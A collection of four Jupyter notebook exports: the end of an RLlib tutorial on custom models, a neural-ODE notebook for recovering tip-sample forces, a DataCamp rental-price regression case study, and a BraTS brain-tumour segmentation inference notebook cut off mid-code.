def forward(self, input_dict, state, seq_lens):
"""Custom-define your forard pass logic here."""
# Pass inputs through our 2 layers and calculate the "value"
# of the observation and store it for when `value_function` is called.
logits, self.cur_value = self.base_model(input_dict["obs"])
return logits, state
def value_function(self):
"""Implement the value branch forward pass logic here:
We will just return the already calculated `self.cur_value`.
"""
assert self.cur_value is not None, "Must call `forward()` first!"
return tf.reshape(self.cur_value, [-1])
class MyTorchModel(TorchModelV2, nn.Module):
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
"""Build a simple [16, 16]-MLP (+ value branch)."""
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
self.device = torch.device("cuda"
if torch.cuda.is_available() else "cpu")
# Hidden layer (shared by action logits outputs and value output).
self.layer_1 = nn.Linear(obs_space.shape[0], 16).to(self.device)
# Action logits output.
self.layer_out = nn.Linear(16, num_outputs).to(self.device)
# "Value"-branch (single node output).
# Used by several RLlib algorithms (e.g. PPO) to calculate an observation's value.
self.value_branch = nn.Linear(16, 1).to(self.device)
self.cur_value = None
def forward(self, input_dict, state, seq_lens):
"""Custom-define your forard pass logic here."""
# Pass inputs through our 2 layers.
layer_1_out = self.layer_1(input_dict["obs"])
logits = self.layer_out(layer_1_out)
# Calculate the "value" of the observation and store it for
# when `value_function` is called.
self.cur_value = self.value_branch(layer_1_out).squeeze(1)
return logits, state
def value_function(self):
"""Implement the value branch forward pass logic here:
We will just return the already calculated `self.cur_value`.
"""
assert self.cur_value is not None, "Must call `forward()` first!"
return self.cur_value
# Do a quick test on the custom model classes.
test_model_tf = MyKerasModel(
obs_space=gym.spaces.Box(-1.0, 1.0, (2, )),
action_space=None,
num_outputs=2,
model_config={},
name="MyModel",
)
print("TF-output={}".format(test_model_tf({"obs": np.array([[0.5, 0.5]])})))
# For PyTorch, you can do:
#test_model_torch = MyTorchModel(
# obs_space=gym.spaces.Box(-1.0, 1.0, (2, )),
# action_space=None,
# num_outputs=2,
# model_config={},
# name="MyModel",
#)
#print("Torch-output={}".format(test_model_torch({"obs": torch.from_numpy(np.array([[0.5, 0.5]], dtype=np.float32))})))
# Set up our custom model and re-run the experiment.
config.update({
"model": {
"custom_model": MyKerasModel, # for torch users: "custom_model": MyTorchModel
"custom_model_config": {
#"layers": [128, 128],
},
},
})
tune.run(
"PPO",
config=config, # for torch users: config=dict(config, **{"framework": "torch"}),
stop={
"training_iteration": 5,
},
)
```
### Deep Dive: A closer look at RLlib's components
#### (Depending on time left and amount of questions having been accumulated :)
We already took a quick look inside an RLlib Trainer object and extracted its Policy(ies) and the Policy's model (neural network). Here is a much more detailed overview of what's inside a Trainer object.
At the core is the so-called `WorkerSet` sitting under `Trainer.workers`. A WorkerSet is a group of `RolloutWorker` (`rllib.evaluation.rollout_worker.py`) objects that always consists of a "local worker" (`Trainer.workers.local_worker()`) and n "remote workers" (`Trainer.workers.remote_workers()`).
<img src="images/rllib_structure.png" width=1000>
### Scaling RLlib
Scaling RLlib works by parallelizing the "jobs" that the remote `RolloutWorkers` do. In a vanilla RL algorithm, like PPO, DQN, and many others, the `@ray.remote` labeled RolloutWorkers in the figure above are responsible for interacting with one or more environments and thereby collecting experiences. Observations are produced by the environment, actions are then computed by the Policy(ies) copy located on the remote worker and sent to the environment in order to produce yet another observation. This cycle is repeated endlessly and only sometimes interrupted to send experience batches ("train batches") of a certain size to the "local worker". There these batches are used to call `Policy.learn_on_batch()`, which performs a loss calculation, followed by a model weights update, and a subsequent weights broadcast back to all the remote workers.
## Time for Q&A
...
## Thank you for listening and participating!
### Here are a couple of links that you may find useful.
- The <a href="https://github.com/sven1977/rllib_tutorials.git">github repo of this tutorial</a>.
- <a href="https://docs.ray.io/en/master/rllib.html">RLlib's documentation main page</a>.
- <a href="http://discuss.ray.io">Our discourse forum</a> to ask questions on Ray and its libraries.
- Our <a href="https://forms.gle/9TSdDYUgxYs8SA9e8">Slack channel</a> for interacting with other Ray RLlib users.
- The <a href="https://github.com/ray-project/ray/blob/master/rllib/examples/">RLlib examples scripts folder</a> with tons of examples on how to do different stuff with RLlib.
- A <a href="https://medium.com/distributed-computing-with-ray/reinforcement-learning-with-rllib-in-the-unity-game-engine-1a98080a7c0d">blog post on training with RLlib inside a Unity3D environment</a>.
| github_jupyter |
```
import numpy as np
from scipy.integrate import solve_ivp
import matplotlib.pyplot as plt
from cp_detection.NeuralODE import GeneralModeDataset, LightningTrainer, TrainModel, LoadModel
from cp_detection.ForceSimulation import ForcedHarmonicOscillator, DMT_Maugis, SimulateGeneralMode
DMT = DMT_Maugis(0.2, 10, 2, 130, 1, 0.3, 0.3)
ode_params = {'Q':12000, 'A0':0.5, 'Om':1., 'k':1000}
FHO = ForcedHarmonicOscillator(**ode_params, Fint = DMT.F)
d_array = np.linspace(1, 10, 20)
t, z_array = SimulateGeneralMode(FHO, d_array, 0.1, 1000, rtol = 1e-7)
z_array.shape
_, ax = plt.subplots(1, 1, figsize = (16, 5))
ax.plot(t[-1000:], z_array[0,:], 'k')
ax.grid(ls = '--')
#ax.axvline(x = 10*ode_params['Q'], color = 'r')
import json
savepath = './Data/digital.json'
savedata = {'ode_params':ode_params, 'd_array': d_array.tolist(), 'z_array': z_array.tolist(), 't' : t.tolist()}
with open(savepath, 'w') as savefile:
json.dump(savedata, savefile)
savepath = './Data/digital.json'
train_dataset = GeneralModeDataset.load(savepath)
import torch
if torch.cuda.is_available:
device = torch.device("cuda")
print("GPU is available")
else:
device = torch.device("cpu")
print("GPU not available, CPU used")
from argparse import Namespace
hparams = Namespace(**{'train_dataset': train_dataset, 'hidden_nodes': [20, 20, 20], 'lr': 0.02, 'batch_size': 20, 'solver': 'dopri5'})
model = LightningTrainer(hparams)
import os
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
checkpoint_callback = ModelCheckpoint(filepath = './checkpoints', save_best_only = True, verbose = True, monitor = 'loss', mode = 'min', prefix = '')
trainer = Trainer(gpus = 1, early_stop_callback = None, checkpoint_callback = checkpoint_callback, show_progress_bar = True, max_nb_epochs=10000)
trainer.fit(model)
```
## Load trained model, evaluate results
```
checkpoint_path = './hall_of_fame/20200206/_ckpt_epoch_1256.ckpt'
model = LoadModel(checkpoint_path)
d = np.linspace(3.0, 10.0, 40)
model.cuda()
F_pred = model.predict_force(d)
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(d, F_pred, '.r', label = 'NN prediction')
ax.plot(d, F(d), '.k', label = 'True Force')
ax.legend()
ax.grid(ls = '--')
sol = solve_ivp(ODE, (0, 50), x0, t_eval = np.linspace(0, 50, 1000))
data = sol.y[1,:] + np.random.normal(scale = 0.3, size = sol.y[1,:].shape)
fig, axes = plt.subplots(1, 2, figsize = (16, 5))
axes[0].plot(sol.t, sol.y[1,:], '.k')
axes[1].plot(sol.t, data, '.k')
for ax in axes:
ax.grid(ls = '--')
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset, DataLoader
from torchdiffeq import odeint_adjoint as odeint
from torchviz import make_dot, make_dot_from_trace
class Fint(nn.Module):
def __init__(self, ndense):
super(Fint, self).__init__()
self.elu = nn.ELU()
self.tanh = nn.Tanh()
self.fc1 = nn.Linear(1, ndense)
self.fc2 = nn.Linear(ndense, ndense)
self.fc3 = nn.Linear(ndense, 1)
def forward(self, x):
out = self.fc1(x)
out = self.elu(out)
out = self.fc2(out)
out = self.elu(out)
out = self.fc2(out)
out = self.elu(out)
out = self.fc3(out)
out = self.tanh(out)
return out
class NN_ODE(nn.Module):
def __init__(self, ndense, Q, A0, Om, k, d):
super(NN_ODE, self).__init__()
self.F = Fint(ndense)
self.Q = Q
self.A0 = A0
self.Om = Om
self.k = k
self.d = d
self.nfe = 0
self.B = torch.tensor([[-1./self.Q, -1.], [1., 0.]], device = device)
self.C = torch.tensor([1.,0.], device = device)
def forward(self, t, x):
self.nfe+=1
F = self.F(x[1].unsqueeze(-1))
#ode = torch.matmul(self.B, x) + (self.d + self.A0*torch.cos(self.Om*t)/self.Q + F/self.k) * self.C
ode = torch.matmul(self.B, x) + (self.d + self.A0*torch.cos(self.Om*t)/self.Q + F) * self.C
# Currently, force term is self.k times larger
return ode
nnode = NN_ODE(4, **params)
nnode.float()
nnode.cuda()
nnode.parameters
optimizer = torch.optim.Adam(nnode.parameters(), lr = 0.01)
loss_function = nn.MSELoss()
x0_tensor = torch.from_numpy(x0).cuda(non_blocking = True).float()
t_samp = torch.from_numpy(sol.t).cuda(non_blocking = True).float()
data = torch.from_numpy(data).cuda(non_blocking = True).float()
data_fft = torch.rfft(data, 1, onesided = True)
data_amp = torch.sum(data_fft**2, dim = -1)
data_logamp = torch.log1p(data_amp)
print(data_logamp.size())
logamp_array = data_logamp.cpu().detach().numpy()
plt.plot(logamp_array[0:50])
x_pred = odeint(nnode, x0_tensor, t_samp)
z_pred = x_pred[:,1]
z_fft = torch.rfft(z_pred, 1)
z_amp = torch.sum(z_fft**2, dim = -1)
z_logamp = torch.log1p(z_amp)
z_logamp.size()
loss = loss_function(z_logamp, data_logamp)
zlogamp_array = z_logamp.cpu().detach().numpy()
plt.plot(zlogamp_array[0:50])
make_dot(loss, params=dict(nnode.named_parameters()))
N_epochs = 500
history = np.zeros((N_epochs, 1))
for epoch in range(N_epochs):
# zero the parameter gradients
optimizer.zero_grad()
running_loss = 0.0
solut = odeint(nnode, x0_tensor, t_samp, method = 'adams')
z_pred = solut[:,1]
z_fft = torch.rfft(z_pred, 1)
z_amp = torch.sum(z_fft**2, dim = -1)
#z_fft = torch.rfft(z_pred, 1)
z_logamp = torch.log1p(z_amp)
#z_logamp.size()
loss = loss_function(z_logamp, data_logamp)
#loss = loss_function(z_amp, data_amp)
#loss = loss_function(z_pred, data)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
print('[%d] loss: %.12e' %(epoch + 1, running_loss))
history[epoch] = running_loss
print('Training Finished')
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(history)
ax.set_yscale('log')
ax.grid(ls = '--')
ax.set_title('Learning Curve', fontsize = 14)
sol = odeint(nnode, x0_tensor, t_samp)
z_final = sol[:,1].cpu().detach().numpy()
t = t_samp.cpu().detach().numpy()
z_true = data.cpu().detach().numpy()
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(t, z_true, '.k', label = 'Data')
ax.plot(t, z_final, '.r', label = 'Prediction')
ax.legend()
ax.grid(ls = '--')
d_array = np.linspace(1, 8, 1000)
d_tensor = torch.from_numpy(d_array).cuda(non_blocking = True).float()
F_true = F(d_array)
F_pred = np.zeros(d_array.shape)
for i in range(len(F_pred)):
F_pred[i] = nnode.F(d_tensor[i].unsqueeze(-1)).cpu().detach().numpy()
fig, ax = plt.subplots(1, 1, figsize = (7, 5))
ax.plot(d_array, F_true, '.k', label = 'True Force')
ax.plot(d_array, F_pred, '.r', label = 'NN Prediction')
ax.axhline(F_true.mean())
ax.legend()
ax.grid(ls = '--')
F_pred
```
| github_jupyter |
# DataCamp Certification Case Study
### Project Brief
A housing rental company has hired you for a new project. They are interested in developing an application to help people estimate the money they could earn renting out their living space.
The company has provided you with a dataset that includes details about each property rented, as well as the price charged per night. They want to avoid estimating prices that are more than 25 dollars off of the actual price, as this may discourage people.
You will need to present your findings to the head of rentals, who has no technical data science background.
The data you will use for this analysis can be accessed here: `"data/rentals.csv"`
```
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
import plotly.express as px
import seaborn as sns
```
## I'M GOING TO USE THE MOST TYPICAL DATA SCIENCE PIPELINE. IT HAS 5 STEPS
## 1.Obtaining the data
## 2.Cleaning the data
## 3.Exploring and visualising the data
## 4.modelling the data
## 5.Interpreting the data
# 1.OBTAINING THE DATA
```
#reading the data into dataframe
df = pd.read_csv('./data/rentals.csv')
df.head()
#No of rows and columns in the dataframe
df.shape
```
# 2.CLEANING THE DATA
```
#checking if there are any null values
df.isna().sum()
```
Now we can see there are 12 null values in "bathrooms" and 4 null values in "bedrooms"
```
#dropping the null values
df.dropna(inplace=True)
df.isna().sum()
#checking the shape of the dataframe after dropping null values
df.shape
df.dtypes
#Now we change the datatype of column "price" from object to float64 using regular expression
df['price'] = df['price'].apply(lambda x: float(re.sub(r'\,|\$', '', x)))
#we dont need "id" because it makes no sense
df.drop(columns=['id'], inplace=True)
```
# 3A.EXPLORING THE DATA
```
# we want to explore every column of data and check what we need for our case study and rest can be dropped from the data
df.property_type.unique()
_ = pd.DataFrame([
df.property_type.value_counts(),
round(df.property_type.value_counts(1) * 100, 2)
], ).T
_.columns = ['count', 'percentage']
_
```
### anything less than 25 can be dropped and hotels, resorts and likewise should be dropped(according to our case study)
```
drop_list = [
'Bed and breakfast', 'Hostel', 'Guesthouse', 'Serviced apartment',
'Aparthotel', 'Guesthouse', 'Other', 'Bungalow', 'Hotel', 'Boutique hotel',
'Other', 'Resort', 'Resort', 'Cottage', 'Villa', 'Castle', 'Cabin',
'Tiny house', 'Earth house', 'Camper/RV', 'In-law', 'Hut', 'Dome house'
]
df = df[~df['property_type'].isin(drop_list)]
df.shape
df.property_type.unique()
df.room_type.unique()
_ = pd.DataFrame([
df.room_type.value_counts(),
round(df.room_type.value_counts(1) * 100, 2)
]).T
_.columns = ['count', 'percentage']
_
df=df[~df.room_type.eq('Entire home/apt')]
df.room_type.unique()
df.bathrooms.unique()
df[df['bathrooms']>5]
df.bedrooms.unique()
df[df['bedrooms']>4]
```
### Removal of Outlier
```
df.price.value_counts(bins=10)
before_removal= df.shape[0]
def find_outliers_IQR(data):
"""
Use Tukey's Method of outlier removal AKA InterQuartile-Range Rule
and return boolean series where True indicates it is an outlier.
- Calculates the range between the 75% and 25% quartiles
- Outliers fall outside upper and lower limits, using a treshold of 1.5*IQR the 75% and 25% quartiles.
IQR Range Calculation:
res = df.describe()
IQR = res['75%'] - res['25%']
lower_limit = res['25%'] - 1.5*IQR
upper_limit = res['75%'] + 1.5*IQR
Args:
data (Series,or ndarray): data to test for outliers.
Returns:
[boolean Series]: A True/False for each row use to slice outliers.
EXAMPLE USE:
>> idx_outs = find_outliers_df(df['AdjustedCompensation'])
>> good_data = df[~idx_outs].copy()
"""
df_b = data
res = df_b.describe()
IQR = res['75%'] - res['25%']
lower_limit = res['25%'] - 1.5 * IQR
upper_limit = res['75%'] + 1.5 * IQR
idx_outs = (df_b > upper_limit) | (df_b < lower_limit)
return idx_outs
df = df[~find_outliers_IQR(df.price)]
after_removal = df.shape[0]
data_loss = round(((after_removal - before_removal)/before_removal)*100,2)
print(data_loss)
df = df[~find_outliers_IQR(df.minimum_nights)]
def describe_dataframe(df: pd.DataFrame()):
"""Statistical description of the pandas.DataFrame."""
left = df.describe(include='all').round(2).T
right = pd.DataFrame(df.dtypes)
right.columns = ['dtype']
ret_df = pd.merge(left=left,
right=right,
left_index=True,
right_index=True)
na_df = pd.DataFrame(df.isna().sum())
na_df.columns = ['nulls']
ret_df = pd.merge(left=ret_df,
right=na_df,
left_index=True,
right_index=True)
ret_df.fillna('', inplace=True)
return ret_df
describe_dataframe(df)
df[df.minimum_nights>365]
#dropping properties that rents more than one year.
df = df[df.minimum_nights<=365]
df.head()
```
# 3B.VISUALISING THE DATA
```
sns.lmplot(x='bedrooms', y='price',data=df, scatter_kws={
"s": 8,
"color": 'silver'
},
line_kws={
'lw': 3,
'color': 'gold'
})
plt.xlabel("Bedrooms")
plt.ylabel("House Price")
plt.title("Bedrooms vs. Rent Price")
plt.show()
sns.lmplot(x='bathrooms', y='price',data=df)
plt.xlabel("bathrooms")
plt.ylabel("House Price")
plt.title("bathrooms vs. Rent Price")
plt.show()
sns.barplot(x='room_type', y='price',data=df)
plt.xlabel("room_type")
plt.ylabel("House Price")
plt.title("room_type vs. Rent Price")
plt.show()
def heatmap_of_features_correlation(df, annot_format='.1f'):
"""
Return a masked heatmap of the given DataFrame
Parameters:
===========
df = pandas.DataFrame object.
annot_format = str, for formatting; default: '.1f'
Example of `annot_format`:
--------------------------
.1e = scientific notation with 1 decimal point (standard form)
.2f = 2 decimal places
.3g = 3 significant figures
.4% = percentage with 4 decimal places
Note:
=====
Rounding error can happen if '.1f' is used.
"""
with plt.style.context('dark_background'):
plt.figure(figsize=(10, 10), facecolor='k')
mask = np.triu(np.ones_like(df.corr(), dtype=bool))
cmap = sns.diverging_palette(3, 3, as_cmap=True)
ax = sns.heatmap(df.corr(),
mask=mask,
cmap=cmap,
annot=True,
fmt=annot_format,
linecolor='k',
annot_kws={"size": 9},
square=True,
linewidths=.5,
cbar_kws={"shrink": .5})
plt.title(f'Features heatmap', fontdict={"size": 20})
plt.show()
return ax
return list(feature_corr)
def drop_features_based_on_correlation(df, threshold=0.75):
"""
Returns features with high collinearity.
Parameters:
===========
df = pandas.DataFrame; no default.
data to work on.
threshold = float; default: .75.
Cut off value of check of collinearity.
"""
# Set of all the names of correlated columns
feature_corr = set()
corr_matrix = df.corr()
for i in range(len(corr_matrix.columns)):
for j in range(i):
# absolute coeff value
if abs(corr_matrix.iloc[i, j]) > threshold:
# getting the name of column
colname = corr_matrix.columns[i]
feature_corr.add(colname)
if not feature_corr:
print(f'No multicollinearity detected at {threshold*100}% threshold.')
else:
return list(feature_corr)
heatmap_of_features_correlation(df)
drop_features_based_on_correlation(df)
```
### Train and Test split
```
X = df.drop(columns='price').copy()
y = df.price.copy()
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=.8)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, MinMaxScaler, StandardScaler, RobustScaler
from sklearn.compose import ColumnTransformer
# isolating numerical cols
nume_col = list(X.select_dtypes('number').columns)
# isolating categorical cols
cate_col = list(X.select_dtypes('object').columns)
# pipeline for processing categorical features
pipe_cate = Pipeline([('ohe', OneHotEncoder(sparse=False, drop=None))])
# pipeline for processing numerical features
pipe_nume = Pipeline([('scaler', StandardScaler())])
# transformer
preprocessor = ColumnTransformer([('nume_feat', pipe_nume, nume_col),
('cate_feat', pipe_cate, cate_col)])
# creating dataframes
# X_train
X_train_pr = pd.DataFrame(preprocessor.fit_transform(X_train),
columns=nume_col +
list(preprocessor.named_transformers_['cate_feat'].
named_steps['ohe'].get_feature_names(cate_col)))
# X_test
X_test_pr = pd.DataFrame(preprocessor.transform(X_test),
columns=nume_col +
list(preprocessor.named_transformers_['cate_feat'].
named_steps['ohe'].get_feature_names(cate_col)))
X_train_pr
y_train
```
# 4.MODELLING THE DATA
### 1.DummyRegressor
```
from sklearn.dummy import DummyRegressor
from sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error
dummy_regr = DummyRegressor(strategy="mean")
dummy_regr.fit(X_train_pr, y_train)
y_pred_dummy = dummy_regr.predict(X_test_pr)
print("MAE :", mean_absolute_error(y_test, y_pred_dummy))
print("r2 :", r2_score(y_test, y_pred_dummy))
```
### 2.LinearRegression
```
from sklearn.linear_model import LinearRegression
reg = LinearRegression(n_jobs=-1)
reg.fit(X_train_pr, y_train)
y_pred_reg = reg.predict(X_test_pr)
print("Coefs :\n", reg.coef_)
mae = (abs(y_test - y_pred_reg)).mean()
print("MAE :", mae)
print("r2 :", r2_score(y_test, y_pred_reg))
```
### 3.RandomForestRegressor
```
from sklearn.ensemble import RandomForestRegressor
def model_stat(y_test, y_pred):
print(' MAE:', mean_absolute_error(y_test, y_pred), '\n', 'MSE:',
mean_squared_error(y_test, y_pred), '\n', 'RMSE:',
np.sqrt(mean_squared_error(y_test, y_pred)), '\n', 'r2:',
r2_score(y_test, y_pred))
rf_reg = RandomForestRegressor(n_estimators=200,
criterion='mae',
n_jobs=-1)
rf_reg.fit(X_train_pr, y_train)
y_pred_rf = rf_reg.predict(X_test_pr)
model_stat(y_test, y_pred_rf)
```
### 4.GridSearch
```
# Number of trees in random forest
n_estimators = [int(x) for x in np.linspace(start = 200, stop = 1000, num = 5)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# # Maximum number of levels in tree
# max_depth = [int(x) for x in np.linspace(10, 60, num = 6)]
# max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10]
# Minimum number of samples required at each leaf node
min_samples_leaf = [1, 2, 4]
# Method of selecting samples for training each tree
bootstrap = [True, False]
# oob_score=[True, False]
# Create the random grid
random_grid = {'n_estimators': n_estimators,
'max_features': max_features,
# 'max_depth': max_depth,
'min_samples_split': min_samples_split,
'min_samples_leaf': min_samples_leaf,
# 'bootstrap': bootstrap,
# 'oob_score': oob_score
}
print(random_grid)
from sklearn.model_selection import RandomizedSearchCV
# Use the random grid to search for best hyperparameters
# First create the base model to tune
rf = RandomForestRegressor(criterion='mae')
# Random search of parameters, using 3 fold cross validation,
# search across 100 different combinations, and use all available cores
rf_random = RandomizedSearchCV(estimator=rf,
param_distributions=random_grid,
n_iter=50,
cv=2,
verbose=2,
scoring ='neg_mean_absolute_error',
random_state=42,
n_jobs=-1)
# Fit the random search model
rf_random.fit(X_train_pr, y_train)
print(rf_random.best_params_)
```
### 5.BestparameterswithRandomForestRegressor
```
rf_reg = RandomForestRegressor(n_estimators=1000,
criterion='mae',
min_samples_split=2,
min_samples_leaf=1,
max_features='sqrt',
max_depth=20,
bootstrap=False,
# oob_score=True,
n_jobs=-1)
rf_reg.fit(X_train_pr, y_train)
y_pred_rf = rf_reg.predict(X_test_pr)
model_stat(y_test, y_pred_rf)
sns.scatterplot(x=y_test, y=y_pred_rf)
sns.scatterplot(x=y_test, y=y_test)
rf_feat_imp = pd.DataFrame(rf_reg.feature_importances_, index=X_train_pr.columns)
rf_feat_imp.sort_values(by=0).plot(kind='barh', legend='', figsize=(10,15), title='Feature Importance', color = 'g')
plt.ylabel('Features')
plt.xlabel('Importance')
plt.show()
#SHAP (SHapley Additive exPlanations) is a game theoretic approach to explain the output of any machine learning model. It connects optimal credit allocation with local explanations using the classic Shapley values from game theory and their related extensions
import shap
shap.initjs()
explainer = shap.TreeExplainer(rf_reg)
shap_values = explainer.shap_values(X_test_pr)
with plt.style.context('seaborn-white'):
shap.summary_plot(shap_values, X_test_pr)
```
### 6.XGBRegressor
```
from xgboost import XGBRegressor, XGBRFRegressor
xgb_reg = XGBRegressor(learning_rate=0.1,
n_estimators=100,
# min_samples_split=2,
# min_samples_leaf=1,
# max_depth=3,
n_jobs=-1,
# subsample=1.0,
verbosity =1,
booster='gbtree',# gbtree, gblinear or dart
objective ='reg:squarederror',
random_state=2021)
xgb_reg.fit(X_train_pr, y_train)
y_pred_xgb = xgb_reg.predict(X_test_pr)
model_stat(y_test, y_pred_xgb)
```
### 7.SupportVectorMachine
```
from sklearn.svm import SVR
regressor = SVR(kernel = 'linear', C=1)
regressor.fit(X_train_pr, y_train)
y_pred_svr = regressor.predict(X_test_pr)
model_stat(y_test, y_pred_svr)
```
# 5.INTERPRETING THE DATA
### bEST MoDEL
### Among all the models tested, the "random forest model" produces the best results and has the smallest mean absolute error.
# CONCLUSION
#### 1. The location of your property does have an impact on rental income.
#### 2. In the near run, location is the most important factor in determining rental pricing.
#### 3. Condo owners might anticipate a boost in rental income.
#### 4. If your property is closer to the city's center, you can charge more.
# FUTURE WORK
#### 1. To assess quality, add demographic information to the model, such as area attractions, restaurants, income level, local transportation, year built information, or refurbishment information.
#### 2. Tweaking of hyperparameters
#### 3. Add Features of the house.
| github_jupyter |
<a href="https://colab.research.google.com/github/alirezash97/BraTS/blob/master/results.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
# !wget https://www.cbica.upenn.edu/MICCAI_BraTS2020_ValidationData
# from google.colab import drive
# drive.mount('/content/drive')
# !unzip /content/MICCAI_BraTS2020_ValidationData -d '/content/drive/My Drive/BraTS2020 validation/'
# from google.colab import drive
# drive.mount('/content/drive')
import os
import numpy as np
from nibabel.testing import data_path
import nibabel as nib
import matplotlib.pyplot as plt
from keras.utils import to_categorical
import cv2
import keras
import random
from keras import backend as K
def soft_dice_loss(y_true, y_pred, axis=(1, 2, 3),
epsilon=0.00001):
dice_numerator = 2. * K.sum(y_true * y_pred, axis=axis) + epsilon
dice_denominator = K.sum(y_true**2, axis=axis) + K.sum(y_pred**2, axis=axis) + epsilon
dice_loss = 1 - K.mean((dice_numerator)/(dice_denominator))
return dice_loss
def dice_coefficient(y_true, y_pred, axis=(1, 2, 3),
epsilon=0.00001):
dice_numerator = 2. * K.sum(y_true * y_pred, axis=axis) + epsilon
dice_denominator = K.sum(y_true, axis=axis) + K.sum(y_pred, axis=axis) + epsilon
dice_coefficient = K.mean((dice_numerator)/(dice_denominator))
return dice_coefficient
# load and evaluate a saved model
from numpy import loadtxt
from keras.models import load_model
# load model
model = load_model('/content/drive/My Drive/BRATS2020/tenth_FlowerModel_update.01-0.06.h5', custom_objects={'soft_dice_loss':soft_dice_loss, 'dice_coefficient':dice_coefficient})
# summarize model.
model.summary()
# load dataset
import glob, os
images_path = glob.glob('/content/drive/My Drive/BraTS2020 validation/**/*.nii.gz', recursive=True)
data_path = ""
X_trainset_filenames = []
y_trainset_filenames = []
for item in images_path:
if 'seg' in item:
y_trainset_filenames.append(os.path.join(data_path, item))
else:
X_trainset_filenames.append(os.path.join(data_path, item))
print(len(X_trainset_filenames))
for i in range (300, 304):
print(X_trainset_filenames[i])
def load_case(image_nifty_file, label_nifty_file):
image_nifty_file
# load the image and label file, get the image content and return a numpy array for each
image = np.zeros((240, 240, 155, 4))
img0 = np.array(nib.load(image_nifty_file[0]).get_fdata())
img1 = np.array(nib.load(image_nifty_file[1]).get_fdata())
img2 = np.array(nib.load(image_nifty_file[2]).get_fdata())
img3 = np.array(nib.load(image_nifty_file[3]).get_fdata())
image[:, :, :, 0] = img0
image[:, :, :, 1] = img1
image[:, :, :, 2] = img2
image[:, :, :, 3] = img3
label = np.array(nib.load(label_nifty_file).get_fdata())
return image, label
def load_case_validation(image_nifty_file):
image_nifty_file
# load the image and label file, get the image content and return a numpy array for each
image = np.zeros((240, 240, 155, 4))
img0 = np.array(nib.load(image_nifty_file[0]).get_fdata())
img1 = np.array(nib.load(image_nifty_file[1]).get_fdata())
img2 = np.array(nib.load(image_nifty_file[2]).get_fdata())
img3 = np.array(nib.load(image_nifty_file[3]).get_fdata())
image[:, :, :, 0] = img0
image[:, :, :, 1] = img1
image[:, :, :, 2] = img2
image[:, :, :, 3] = img3
# label = np.array(nib.load(label_nifty_file).get_fdata())
return image #, label
def sort_by_channel(sample_path):
n = int(len(sample_path) / 4)
new_path = []
for i in range(n):
temp = sample_path[(i*4): (i+1)*4]
new_temp = []
###############
for path in temp:
if '_t1.' in path:
new_temp.append(path)
else:
pass
for path in temp:
if '_t1ce.' in path:
new_temp.append(path)
else:
pass
for path in temp:
if '_t2.' in path:
new_temp.append(path)
else:
pass
for path in temp:
if '_flair.' in path:
new_temp.append(path)
else:
pass
################
for path in new_temp:
new_path.append(path)
return new_path
X_trainset_filenames_by_channels = sort_by_channel(X_trainset_filenames[412:416])
# image , label = load_case(X_trainset_filenames_by_channels, y_trainset_filenames)
image = load_case_validation(X_trainset_filenames_by_channels)
print(image.shape)
# print(label.shape)
def get_sub_volume(image, label):
sub_volume_X = []
sub_volume_y = []
sub_volume_X_middle = []
for z in range(8, 147, 16):
sub_middle_0 = image[60:180, :120, z::z+16, :]
sub_middle_1 = image[60:180, 120:, z::z+16, :]
for j in range (0, 240, 120):
for k in range(0, 240, 120):
sub = image[ j:j+120, k:k+120, z:z+16, :]
sub_volume_X.append(sub)
sub = label[ j:j+120, k:k+120, z:z+16]
sub_volume_y.append(sub)
sub_volume_X_middle.append(sub_middle_0)
sub_volume_X_middle.append(sub_middle_1)
return sub_volume_X, sub_volume_y, sub_volume_X_middle
def get_sub_volume_validation(image):
sub_volume_X = []
sub_volume_X_middle = []
# sub_volume_y = []
for z in range(8, 147, 16):
sub_middle_0 = image[:120, 60:180, z:z+16, :]
sub_middle_1 = image[120:, 60:180, z:z+16, :]
for j in range(0, 240, 120):
for k in range(0, 240, 120):
sub = image[ j:j+120, k:k+120, z:z+16, :]
sub_volume_X.append(sub)
# sub = label[ j:j+120, k:k+120, z:z+16]
# sub_volume_y.append(sub)
sub_volume_X_middle.append(sub_middle_0)
sub_volume_X_middle.append(sub_middle_1)
return sub_volume_X, sub_volume_X_middle #, sub_volume_y
# X, y = get_sub_volume(image, label)
X, X_middle = get_sub_volume_validation(image)
print(len(X))
print(len(X_middle))
# print(len(y))
print(X[1].shape)
print(X_middle[10].shape)
# print(y[1].shape)
from tqdm import tqdm
y_pred = []
for item in tqdm(X):
temp_0 = item.reshape((1, 120, 120, 16, 4))
temp = model.predict(temp_0)
y_pred.append(temp)
y_pred_middle = []
for item in tqdm(X_middle):
temp_0 = item.reshape((1, 120, 120, 16, 4))
temp = model.predict(temp_0)
y_pred_middle.append(temp)
y_pred_middle[0].shape
def get_whole_image(predict, predict_middle):
prediction = np.zeros((240, 240, 155, 3))
counter = 0
counter_middle = 0
for z in range(8, 147, 16):
for j in range (0, 240, 120):
for k in range(0, 240, 120):
prediction[j:j+120, k:k+120, z:z+16, :] = predict[counter]
counter +=1
middle_temp_0 = np.reshape(predict_middle[counter_middle], (120, 120, 16, 3))
prediction[:120, 60:120, z:z+16, :] += middle_temp_0[:, :60, :, :]
prediction[:120, 120:180, z:z+16, :] += middle_temp_0[:, 60:, :, :]
middle_temp_1 = np.reshape(predict_middle[counter_middle+1], (120, 120, 16, 3))
prediction[120:, 60:120, z:z+16, :] += middle_temp_1[:, :60, :, :]
prediction[120:, 120:180, z:z+16, :] += middle_temp_1[:, 60:, :, :]
counter_middle += 2
return prediction
y = get_whole_image(y_pred, y_pred_middle)
print(y.shape)
# from ipywidgets import interact
# def explore_3dimage(layer):
